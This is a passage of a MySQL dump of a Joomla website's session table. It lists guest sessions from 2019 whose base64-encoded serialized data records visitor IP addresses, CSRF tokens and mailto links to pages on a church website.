o4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjc1OiJodHRwczovL2xpZmVvYXNpc2ludGVybmF0aW9uYWxjaHVyY2gub3JnL3Jlc291cmNlcy9ibG9nL2l0ZW0vMTAtc2Vuc2l0aXZpdHkiO3M6NjoiZXhwaXJ5IjtpOjE1NjkzODMxMDg7fXM6NDA6IjY1YjMwNzY0YmM3YzNhNjZlYzMwMTljM2Q5ZDM5MmE4MGRhYjMwYTUiO086ODoic3RkQ2xhc3MiOjI6e3M6NDoibGluayI7czo3MjoiaHR0cHM6Ly9saWZlb2FzaXNpbnRlcm5hdGlvbmFsY2h1cmNoLm9yZy9yZXNvdXJjZXMvYmxvZy9pdGVtLzEyLWJ1c2luZXNzIjtzOjY6ImV4cGlyeSI7aToxNTY5MzgzMTE0O319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3534323736383530393235616661653465333838363933313462626533353364, 0, 1, 1569382914, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjkxMztzOjQ6Imxhc3QiO2k6MTU2OTM4MjkxMztzOjM6Im5vdyI7aToxNTY5MzgyOTEzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE0MS4yMjYuMzYuNzAiO31zOjU6InRva2VuIjtzOjMyOiJ1Z2FmeWxUTm5nRkVLbmZnQU9RTnRnelVIZXVQM0ZPNCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3534363535303966643635343835383333656562616561393234326361326430, 0, 1, 1569384939, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDkzOTtzOjQ6Imxhc3QiO2k6MTU2OTM4NDkzOTtzOjM6Im5vdyI7aToxNTY5Mzg0OTM5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJibG0wSFhFcnlFYTI5YzBPUlN5R2VyZXVSYmhsaWdPUSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3535363466633137356563633838393037636130363534636466313362666239, 0, 1, 1569377916, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzkxNTtzOjQ6Imxhc3QiO2k6MTU2OTM3NzkxNTtzOjM6Im5vdyI7aToxNTY5Mzc3OTE1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5OC41OC4xMTIuMTAzIjt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3535643731633764313963626639383766643037376436323361636435653831, 0, 1, 1569384689, 'joomla|s:1104:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDY4OTtzOjQ6Imxhc3QiO2k6MTU2OTM4NDY4OTtzOjM6Im5vdyI7aToxNTY5Mzg0Njg5O31zOjU6InRva2VuIjtzOjMyOiJSd0JFQjY5c1lFZ2pudXVIdG4yZllkc2FLSUtvTFJLVSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO31zOjEwOiJjb21fbWFpbHRvIjtPOjg6InN0ZENsYXNzIjoxOntzOjU6ImxpbmtzIjthOjE6e3M6NDA6IjE4YTQxMWQxNTEyNjgyM2M0NDU3MjAyODAxZWZiZmZjMWNhZmRmNGEiO086ODoic3RkQ2xhc3MiOjI6e3M6NDoibGluayI7czoxMDg6Imh0dHBzOi8vZWFnbGUubGlmZW9hc2lzaW50ZXJuYXRpb25hbGNodXJjaC5vcmcvY29tcG9uZW50L2syL2l0ZW0vNjItbGl2aW5nLXRoZS1kaXZpbmVseS1hc3Npc3RlZC1saWZlLXBhcnQtMiI7czo2OiJleHBpcnkiO2k6MTU2OTM4NDY4OTt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3537633737626337636638633566313365316363626231383032626536363635, 0, 1, 1569384920, 'joomla|s:1180:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDkyMDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDkyMDtzOjM6Im5vdyI7aToxNTY5Mzg0OTIwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJ1eUNURGFGVTFxSWpQbElyQkQ2clFWTUZNakx1MUdNbiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO31zOjEwOiJjb21fbWFpbHRvIjtPOjg6InN0ZENsYXNzIjoxOntzOjU6ImxpbmtzIjthOjE6e3M6NDA6ImYxYTE0MWYwZTJiYTU2ZWY0NDVmYzcwMDNiZWY2YjMzNWFmYjQ0MzMiO086ODoic3RkQ2xhc3MiOjI6e3M6NDoibGluayI7czo5OToiaHR0cHM6Ly9saWZlb2FzaXNpbnRlcm5hdGlvbmFsY2h1cmNoLm9yZy9yZXNvdXJjZXMvYmxvZy9pdGVtLzIxLWZyb20tb3VyLWZhdGhlci1zLWhlYXJ0LTA1LTAyLTIwMTcvIjtzOjY6ImV4cGlyeSI7aToxNTY5Mzg0OTIwO319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3538386533386437643663343335613636363835373066316234653664353532, 0, 1, 1569382776, 'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4Mjc3NTtzOjQ6Imxhc3QiO2k6MTU2OTM4Mjc3NTtzOjM6Im5vdyI7aToxNTY5MzgyNzc1O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3562623632313838333762386538396234306234376635366631306365396338, 0, 1, 1569384150, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDE1MDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDE1MDtzOjM6Im5vdyI7aToxNTY5Mzg0MTUwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS45My4yOSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3564353035613833666530313436346663613366663238366438373332386165, 0, 1, 1569382625, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjYyNDtzOjQ6Imxhc3QiO2k6MTU2OTM4MjYyNDtzOjM6Im5vdyI7aToxNTY5MzgyNjI0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTU6IjE3My4yMzAuMTMzLjE2NCI7fXM6NToidG9rZW4iO3M6MzI6IlNPWGpZVTRtcUZFc20zd1V2b09MaHlTaE9xNlBOSkVsIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3565643266326237306235313762343065323937323033393336303231396231, 0, 1, 1569377932, 'joomla|s:1088:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzkzMjtzOjQ6Imxhc3QiO2k6MTU2OTM3NzkzMjtzOjM6Im5vdyI7aToxNTY5Mzc3OTMyO31zOjU6InRva2VuIjtzOjMyOiJWRlhZcVNGTm1sNnYwRkVoTlNqU0MwWmlVdVhyWUNSbCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO31zOjEwOiJjb21fbWFpbHRvIjtPOjg6InN0ZENsYXNzIjoxOntzOjU6ImxpbmtzIjthOjE6e3M6NDA6IjEyMjdhZmZmM2NiMWZlYTExNWFjZjQyOWE3MWEzNjc0NmMwMzU5YTAiO086ODoic3RkQ2xhc3MiOjI6e3M6NDoibGluayI7czo5OToiaHR0cHM6Ly9lYWdsZS5saWZlb2FzaXNpbnRlcm5hdGlvbmFsY2h1cmNoLm9yZy9kaXZpbmUtYWdlbmRhL2l0ZW0vMjItY29ycmVjdD90bXBsPWNvbXBvbmVudCZwcmludD0xIjtzOjY6ImV4cGlyeSI7aToxNTY5Mzc3OTMyO319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3566303364373838316566326439353165363037356364643433383235316630, 0, 1, 1569379809, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTgwODtzOjQ6Imxhc3QiO2k6MTU2OTM3OTgwODtzOjM6Im5vdyI7aToxNTY5Mzc5ODA4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5OC41OC4xMTIuMTAzIjt9czo1OiJ0b2tlbiI7czozMjoid0pSU3FUWHRCSnlFV1I2UVRtSVBuSW5HMmZBamQ5cUwiO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3566366130316538313039623731613463663436313831336135626337636565, 0, 1, 1569379924, 'joomla|s:1180:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTkyMztzOjQ6Imxhc3QiO2k6MTU2OTM3OTkyMztzOjM6Im5vdyI7aToxNTY5Mzc5OTIzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44My42MyI7fXM6NToidG9rZW4iO3M6MzI6IlU5OTdLZUFQUVQxY1lISkkyTUFGaGZmMU1PWVNvVnVVIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiNDJlYzY4NmYxNmM5ODUzMDBkZTdlNTQ5YzE0ZTA0ZGYwYTJjNmRhYSI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjk4OiJodHRwczovL2xpZmVvYXNpc2ludGVybmF0aW9uYWxjaHVyY2gub3JnL3Jlc291cmNlcy9ibG9nL2l0ZW0vNDgtZnJvbS1vdXItZmF0aGVyLXMtaGVhcnQtMjEtMDUtMjAxNyI7czo2OiJleHBpcnkiO2k6MTU2OTM3OTkyNDt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3566613730633563333038663930386562616336326561316464373133663463, 0, 1, 1569379810, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTgxMDtzOjQ6Imxhc3QiO2k6MTU2OTM3OTgxMDtzOjM6Im5vdyI7aToxNTY5Mzc5ODEwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjQ1Ljc5LjIxMC41NyI7fXM6NToidG9rZW4iO3M6MzI6Ikt4UVVIRXlKelJ4djJoRlBRWVloM2FIQkxWM21RcU01Ijt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3631383532333166643963363763616336386432323736613732353636366363, 0, 1, 1569379966, 'joomla|s:1180:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTk2NjtzOjQ6Imxhc3QiO2k6MTU2OTM3OTk2NjtzOjM6Im5vdyI7aToxNTY5Mzc5OTY2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44My42MyI7fXM6NToidG9rZW4iO3M6MzI6Ik5vY3c5ekdpbnJMUE40cGg2OVg1RVhSNllaelVibTFHIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiNWM0ZWMwODdkZWRhMjJjZmVjN2FlZTQwMDYyMDk5NWM0YjM0YjlhOCI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjk4OiJodHRwczovL2xpZmVvYXNpc2ludGVybmF0aW9uYWxjaHVyY2gub3JnL3Jlc291cmNlcy9ibG9nL2l0ZW0vNDEtZnJvbS1vdXItZmF0aGVyLXMtaGVhcnQtMDItMDQtMjAxNyI7czo2OiJleHBpcnkiO2k6MTU2OTM3OTk2Njt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3632336631323961336539343061353634383765373966343730306230363632, 0, 1, 1569382208, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjIwNztzOjQ6Imxhc3QiO2k6MTU2OTM4MjIwNztzOjM6Im5vdyI7aToxNTY5MzgyMjA3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJMZ21CSnZPR3dhVUJEc1c5TnFUVGRURDU0QzNQVmhaZCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3632653737633462666532626532663366313237376638343261366533623935, 0, 1, 1569384742, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDc0MjtzOjQ6Imxhc3QiO2k6MTU2OTM4NDc0MjtzOjM6Im5vdyI7aToxNTY5Mzg0NzQyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE5OC41OC45Ni4yMTIiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, '');
INSERT INTO `y57u5_session` (`session_id`, `client_id`, `guest`, `time`, `data`, `userid`, `username`) VALUES
(0x3634323961663439393337653463376566336533666335386230333430383831, 0, 1, 1569385578, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTU3ODtzOjQ6Imxhc3QiO2k6MTU2OTM4NTU3ODtzOjM6Im5vdyI7aToxNTY5Mzg1NTc4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjU0LjM4Ljc5LjI0OSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGl